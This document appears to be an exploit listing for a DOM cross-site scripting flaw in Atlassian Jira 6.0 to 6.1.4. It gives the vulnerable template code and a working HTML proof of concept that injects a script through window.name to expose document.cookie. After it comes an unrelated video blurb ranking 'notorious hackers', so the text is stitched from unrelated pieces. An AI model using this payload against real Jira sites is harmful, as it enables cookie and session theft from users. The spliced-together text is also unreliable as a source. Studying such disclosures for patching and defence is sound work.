Atlassian Jira 6.0.* <= 6.1.4 DOM XSS [Unauthenticated]

TeslaMotors Bug Bounty - DOM XSS - PoC
# Exploit Title: Atlassian Jira 6.0.* <= 6.1.4 DOM XSS
# Date : 27.01.2016
# Author: Razvan Cernaianu
# Vendor Homepage: https://www.atlassian.com
# Version: 6.0.* <= 6.1.4
# Website: www.CyberSmartDefence.com
# Blog: www.TinKode.com

---[ Vulnerable Code ]---

# Vulnerable Parameter: $window.name
<div class="aui-page-header-main">
  <h1>${name}</h1>
</div>

---[ Proof of Concept ]---

<html>
<script>
 var victim= window.open('https://victim/secure/Dashboard.jspa', '<script>alert(document.cookie);<\/script>');
</script>
</html>  

Top10Archive: Top 10 Notorious Hackers Around The World

Quote: "Welcome to Top10Archive! In today’s day and age the internet can become a battleground for cyber wars. Hackers have been known to take down crucial websites, steal credit card information, take down gaming servers, and even use their expertise to assist government agencies. In the cyber world, some of these hackers have gained quite a bit of fame for their computer expertise, becoming some of the most notorious hackers in internet history."


Watch the video
10. Lizard Squad
9. Johnathan James
8. Syrian Electronic Army
7. Gary McKinnon
6. Jeanson Ancheta
5. Kevin Mitnick
4. Kristina Svechinskaya
3. ASTRA
2. TinKode
1. Anonymous